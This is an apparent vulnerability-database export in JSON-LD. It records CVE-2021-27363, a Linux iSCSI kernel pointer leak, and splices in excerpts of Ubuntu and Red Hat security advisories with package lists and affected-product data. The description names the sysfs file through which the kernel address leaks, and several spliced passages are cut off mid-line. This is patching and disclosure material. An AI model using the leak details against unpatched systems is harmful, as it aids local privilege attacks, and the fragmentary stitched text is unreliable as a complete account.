      },
      {
        "date": "2020-01-28T15:44:44",
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "date": "2020-02-19T15:25:47",
        "db": "PACKETSTORM",
        "id": "156419"
      },
      {
        "date": "2020-01-09T15:06:22",
        "db": "PACKETSTORM",
        "id": "155890"
      },
      {
        "date": "2020-02-19T15:27:54",
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "date": "2020-04-28T20:19:01",
        "db": "PACKETSTORM",
        "id": "157422"
      },
      {
        "date": "2020-02-19T15:35:02",
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "date": "2020-04-28T20:29:58",
        "db": "PACKETSTORM",
        "id": "157444"
      },
      {
        "date": "2020-01-29T17:15:05",
        "db": "PACKETSTORM",
        "id": "156124"
      },
      {
        "date": "2019-11-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1078"
      },
      {
        "date": "2019-11-18T06:15:12.140000",
        "db": "NVD",
        "id": "CVE-2019-19057"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-08-24T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-19057"
      },
      {
        "date": "2021-04-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1078"
      },
      {
        "date": "2023-11-07T03:07:24.680000",
        "db": "NVD",
        "id": "CVE-2019-19057"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "db": "PACKETSTORM",
        "id": "156419"
      },
      {
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "db": "PACKETSTORM",
        "id": "156124"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1078"
      }
    ],
    "trust": 1.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel Resource Management Error Vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1078"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1078"
      }
    ],
    "trust": 0.6
  }
}

var-202103-0920
Vulnerability from variot

An issue was discovered in the Linux kernel through 5.11.3. A kernel pointer leak can be used to determine the address of the iscsi_transport structure. When an iSCSI transport is registered with the iSCSI subsystem, the transport's handle is available to unprivileged users via the sysfs file system, at /sys/class/iscsi_transport/$TRANSPORT_NAME/handle. When read, the show_transport_handle function (in drivers/scsi/scsi_transport_iscsi.c) is called, which leaks the handle. This handle is actually the pointer to an iscsi_transport struct in the kernel module's global variables. 7.4) - noarch, x86_64

Bug Fix(es):

  • Enable CI and changelog for GitLab workflow (BZ#1930932)

  • ========================================================================= Ubuntu Security Notice USN-4901-1 April 06, 2021

linux-lts-trusty vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 12.04 ESM

Summary:

Several security issues were fixed in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-27365)

It was discovered that the LIO SCSI target implementation in the Linux kernel performed insufficient identifier checking in certain XCOPY requests. An attacker with access to at least one LUN in a multiple backstore environment could use this to expose sensitive information or modify data. (CVE-2020-28374)

Adam Nichols discovered that the iSCSI subsystem in the Linux kernel did not properly restrict access to iSCSI transport handles. A local attacker could use this to cause a denial of service or expose sensitive information (kernel pointer addresses). A local attacker could use this to cause a denial of service (system crash) or expose sensitive information (kernel memory). (CVE-2021-27364)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 12.04 ESM: linux-image-3.13.0-185-generic 3.13.0-185.236~12.04.1 linux-image-generic-lts-trusty 3.13.0.185.170

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Bug Fix(es):

  • kernel-rt possible livelock: WARNING: CPU: 28 PID: 3109 at kernel/ptrace.c:242 ptrace_check_attach+0xdd/0x1a0 (BZ#1925308)

  • kernel-rt: update RT source tree to the RHEL-8.3.z3 source tree (BZ#1926369)

  • -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2021:1071-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:1071 Issue date: 2021-04-06 CVE Names: CVE-2021-27363 CVE-2021-27364 CVE-2021-27365 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

Security Fix(es):

  • kernel: out-of-bounds read in libiscsi module (CVE-2021-27364)

  • kernel: heap buffer overflow in the iSCSI subsystem (CVE-2021-27365)

  • kernel: iscsi: unrestricted access to sessions and handles (CVE-2021-27363)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • Customer testing eMMC sees and intermittent boot problem on 7.8+, was not seen on 7.3 (BZ#1918916)

  • tcm loopback driver causes double-start of scsi command when work is delayed (BZ#1925652)

  • [Azure][RHEL-7]Mellanox Patches To Prevent Kernel Hang In MLX4 (BZ#1925691)

  • A patch from upstream c365c292d059 causes us to end up leaving rt_nr_boosted in an inconsistent state, which causes a hard lockup. (BZ#1928082)

  • [RHEL7.9.z] Add fix to update snd_wl1 in bulk receiver fast path (BZ#1929804)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1930078 - CVE-2021-27365 kernel: heap buffer overflow in the iSCSI subsystem 1930079 - CVE-2021-27363 kernel: iscsi: unrestricted access to sessions and handles 1930080 - CVE-2021-27364 kernel: out-of-bounds read in libiscsi module

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-1160.24.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.24.1.el7.noarch.rpm kernel-doc-3.10.0-1160.24.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.24.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm kernel-devel-3.10.0-1160.24.1.el7.x86_64.rpm kernel-headers-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.24.1.el7.x86_64.rpm perf-3.10.0-1160.24.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm python-perf-3.10.0-1160.24.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.24.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: kernel-3.10.0-1160.24.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.24.1.el7.noarch.rpm kernel-doc-3.10.0-1160.24.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.24.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm kernel-devel-3.10.0-1160.24.1.el7.x86_64.rpm kernel-headers-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.24.1.el7.x86_64.rpm perf-3.10.0-1160.24.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm python-perf-3.10.0-1160.24.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.24.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-1160.24.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.24.1.el7.noarch.rpm kernel-doc-3.10.0-1160.24.1.el7.noarch.rpm

ppc64: bpftool-3.10.0-1160.24.1.el7.ppc64.rpm bpftool-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm kernel-3.10.0-1160.24.1.el7.ppc64.rpm kernel-bootwrapper-3.10.0-1160.24.1.el7.ppc64.rpm kernel-debug-3.10.0-1160.24.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm kernel-debug-devel-3.10.0-1160.24.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1160.24.1.el7.ppc64.rpm kernel-devel-3.10.0-1160.24.1.el7.ppc64.rpm kernel-headers-3.10.0-1160.24.1.el7.ppc64.rpm kernel-tools-3.10.0-1160.24.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm kernel-tools-libs-3.10.0-1160.24.1.el7.ppc64.rpm perf-3.10.0-1160.24.1.el7.ppc64.rpm perf-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm python-perf-3.10.0-1160.24.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm

ppc64le: bpftool-3.10.0-1160.24.1.el7.ppc64le.rpm bpftool-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-debug-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-devel-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-headers-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-tools-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-1160.24.1.el7.ppc64le.rpm perf-3.10.0-1160.24.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm python-perf-3.10.0-1160.24.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm

s390x: bpftool-3.10.0-1160.24.1.el7.s390x.rpm bpftool-debuginfo-3.10.0-1160.24.1.el7.s390x.rpm kernel-3.10.0-1160.24.1.el7.s390x.rpm kernel-debug-3.10.0-1160.24.1.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.s390x.rpm kernel-debug-devel-3.10.0-1160.24.1.el7.s390x.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-1160.24.1.el7.s390x.rpm kernel-devel-3.10.0-1160.24.1.el7.s390x.rpm kernel-headers-3.10.0-1160.24.1.el7.s390x.rpm kernel-kdump-3.10.0-1160.24.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-1160.24.1.el7.s390x.rpm kernel-kdump-devel-3.10.0-1160.24.1.el7.s390x.rpm perf-3.10.0-1160.24.1.el7.s390x.rpm perf-debuginfo-3.10.0-1160.24.1.el7.s390x.rpm python-perf-3.10.0-1160.24.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.s390x.rpm

x86_64: bpftool-3.10.0-1160.24.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm kernel-devel-3.10.0-1160.24.1.el7.x86_64.rpm kernel-headers-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.24.1.el7.x86_64.rpm perf-3.10.0-1160.24.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm python-perf-3.10.0-1160.24.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: bpftool-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1160.24.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-1160.24.1.el7.ppc64.rpm perf-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm

ppc64le: bpftool-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-1160.24.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm

x86_64: bpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.24.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-1160.24.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.24.1.el7.noarch.rpm kernel-doc-3.10.0-1160.24.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.24.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm kernel-devel-3.10.0-1160.24.1.el7.x86_64.rpm kernel-headers-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.24.1.el7.x86_64.rpm perf-3.10.0-1160.24.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm python-perf-3.10.0-1160.24.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.24.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2021-27363 https://access.redhat.com/security/cve/CVE-2021-27364 https://access.redhat.com/security/cve/CVE-2021-27365 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYGwp7tzjgjWX9erEAQgQXQ//b1YLCLj3RXDop9pRP30zQj7xj3xDYBK5 7FLTR7K6HVYynrzKBJ87TyJkuhaPpTi8452HYHjLaYt6VYa+j1Jr+PVQr+ZaO+Rz iSRl3Sr5NYynAt9g2vNp6tfeeYPddVSpDpxkUr84EDRZ9Jg8tYtLkanRT9cH02gs +TYPCUZn/2Ii6YQjksIZmv6VVUZepMaO/kDDEi89ivGCffaMvS70Z86498XawgeM eJttBvztEv5K6wvaRtnJegmeonYKxouP1FYDyXh+WAG6zjQDcUEWUKgwdGGn+mXb k4T6F/ktCAx7wSKgt4kMvVmvzOc5jScJ2V0aK3rvm5LnqHoNin5syGOIHm6BM5Jp KTO6MGa9ex7xQdz/pNU/4aqxtKK0G4ceL8xjEGpei5U0gIEXuK4KFySa1bDQa2Xd eN2VtwzajY2tvCe7FrKuwKGb6HyIQK39C8hUHsD2x+JwLCxb12DWBY0ulJzh2C2l LPwWFWMhJqH2GG2wIKh6msCQOMJOGO3zwLtkGMj5dXrmDBHhkkT1FZnL0DdDxL3m JGija+Tr50EFGBFZvS1brChBEqwHqklkUQ3nWVXDj8ipRXJMOOGHbssw9FqnX01B qF414rmDTU1tBHc7bPo8/q5zMXKV5vOixRplzs0sw0hlBJKjvlpVpDMiseo3crlj ghAOW9EzFXk=pxZs -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 7.7) - ppc64, ppc64le, x86_64

Bug Fix(es):

  • memcg: mem_cgroup_idr can be updated in an uncoordinated manner which can lead to corruption (BZ#1931899)

  • [infiniband] Backport Request to fix Multicast Sendonly joins (BZ#1937819)

  • [Azure][RHEL-7]Mellanox Patches To Prevent Kernel Hang In MLX4 (BZ#1939791)

  • 8) - aarch64, noarch, ppc64le, s390x, x86_64

Bug Fix(es):

  • race condition when creating child sockets from syncookies (BZ#1915529)

  • On System Z, a hash needs state randomized for entropy extraction (BZ#1915816)

  • scsi: target: core_tmr_abort_task() reporting multiple aborts for the same se_cmd->tag (BZ#1918354)

  • [mlx5] VF interface stats are not reflected in "ip -s link show" / "ifconfig " commands (BZ#1921060)

  • Win10 guest automatic reboot after migration in Win10 and WSL2 on Intel hosts (BZ#1923281)

  • [RHEL 8.3] Repeated messages - Unable to burst-read optrom segment (BZ#1924222)

  • Backport bug fix RDMA/umem: Prevent small pages from being returned by ib_umem_find_best_pgsz (BZ#1924691)

  • [Cisco 8.3] RHEL/Cent 8.2 fNIC driver needs a patch fix that addresses crash (BZ#1925186)

  • RHEL8.3 - The kernel misdetects zCX with z/VM (BZ#1925508)

  • Backport 22e4663e91 ("mm/slub: fix panic in slab_alloc_node()") (BZ#1925511)

  • SCTP "Address already in use" when no active endpoints from RHEL 8.2 onwards (BZ#1927521)

  • lpfc: Fix initial FLOGI failure due to BBSCN not supported (BZ#1927921)

  • [mm] mm, oom: remove oom_lock from oom_reaper (BZ#1929738)

  • Unexpected thread movement with AMD Milan compared to Rome (BZ#1929740)

  • rpmbuild cannot build the userspace RPMs in the kernel package when the kernel itself is not built (BZ#1929910)

  • [Regression] RHEL8.2 - ISST-LTE:pVM:diapvmlp83:sum:memory DLPAR fails to add memory on multiple trials[mm/memory_hotplug.c:1163] (mm-) (BZ#1930168)

  • Configuring the system with non-RT kernel will hang the system (BZ#1930735)

  • Upstream Patch for Gracefully handle DMAR units with no supported address widthsx86/vt-d (BZ#1932199)

  • gfs2: Deadlock between gfs2_{create_inode,inode_lookup} and delete_work_func (BZ#1937109)

  • Failing on tsx-ctrl when the flag doesn't change anything (BZ#1939013)

Enhancement(s):

  • RFE: Backport all Audit enhancements and fixes up to version 5.10-rc1 (BZ#1907520)

  • RHEL8.4: Update the target driver (BZ#1918363)

  • [Mellanox 8.4 FEAT] mlx5: Hairpin Support in Switch Mode (BZ#1924689)

4

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202103-0920",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11.3"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-27363"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.11.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-27363"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162242"
      },
      {
        "db": "PACKETSTORM",
        "id": "162341"
      },
      {
        "db": "PACKETSTORM",
        "id": "162108"
      },
      {
        "db": "PACKETSTORM",
        "id": "162098"
      },
      {
        "db": "PACKETSTORM",
        "id": "162528"
      },
      {
        "db": "PACKETSTORM",
        "id": "162112"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2021-27363",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
